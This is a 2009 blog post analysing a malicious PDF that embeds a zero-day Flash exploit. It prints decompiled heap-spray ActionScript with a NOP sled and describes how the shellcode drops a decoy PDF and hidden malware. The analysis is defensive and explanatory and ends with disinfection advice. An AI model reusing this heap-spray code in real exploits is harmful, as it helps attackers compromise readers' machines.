Hi readers
Recently I have received a sample of recent 0-day SWF exploit embedded in PDF. I have analyzed this exploit and found some interesting points.
This PDF file have 2 embedded SWF files, one of them simply sprays the Adobe process heap and the other one triggers the bug in AVM2 (Action Script Virtual Machine).
First I want to explain a little about heap sprayer SWF file. Here is decompiled code from heap_spray.swf:
package
{
import flash.display.*;
import flash.utils.*;
dynamic public class MainTimeline extends MovieClip
{
public var byteArr:ByteArray;
public var b:Object;
public var a:Object;
public function MainTimeline()
{
addFrameScript(0, frame1);
return;
}// end function
function frame1()
{
b = "\f\f\f\f";
a = "\x13\x13\x13\x13";
while (b.length < 1048576)
{
b = b + a;
}
byteArr = new ByteArray();
byteArr.writeByte(64);
byteArr.writeByte(64);
byteArr.writeByte(64);
byteArr.writeByte(64);
while (byteArr.length < 1048576 * 64)
{
byteArr.writeMultiByte(b, "iso-8859-1");
}
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(144);
...........
I'll try to explain step-by-step what this ActionScript trying to do:
1) Creates a variable with 4 bytes of a char which have ascii code 19.
2) Creates a byte array and appends 4 bytes of ascii code 19 charachter until byte array size exceeds 0x100000 bytes.
3) It appends 6 bytes of NOP sled to byte array.
4) Then tries to append original shellcode which:
a) Calls GetCommandLineA to get path of PDF file.
b) Opens/Reads PDF file's attachment. The attachment is called "love_wallpaper_butterfly-dsc08951.jpg", but infact it's not a JPEG image file, it's crypted 2 exe files, TEMP.EXE and SUCHOST.EXE
c) Shellcode reads both exe files, decrypt them and put them in Current User's %TEMP% folder.
d) One of exe files have a PDF file embedded and opens a working normal PDF file with some text. Other file is the malware which is detected by most of AVs on VT (virustotal).
Here is screenshot of attachment in PDF:
TEMP.EXE is the file which have PDF embedded and tries to trick user and unexperienced users will think Acrobat just restarted and original PDF file opened.
SUCHOST.EXE is the malware which installs Sysmon.sys and makes it hidden. Simply you can disinfect your PC from this malware by using GMER.
I'll publish more details about other SWF exploit file which triggers bug in AVM2 (ActionScript Virtual Machine).
It's obvious that embedding flash in PDF files feature will have more bugs in near future.
I should mention that this bug was already reported to Adobe as a crash bug, but it seems online some smart chineese people determined it's importance.
I'll publish next article in next few days about this bug.
If you have any question related to this exploit, don't hesitate to ask me.
Kind Regards
Friday, August 14, 2009
Subscribe to:
Posts (Atom)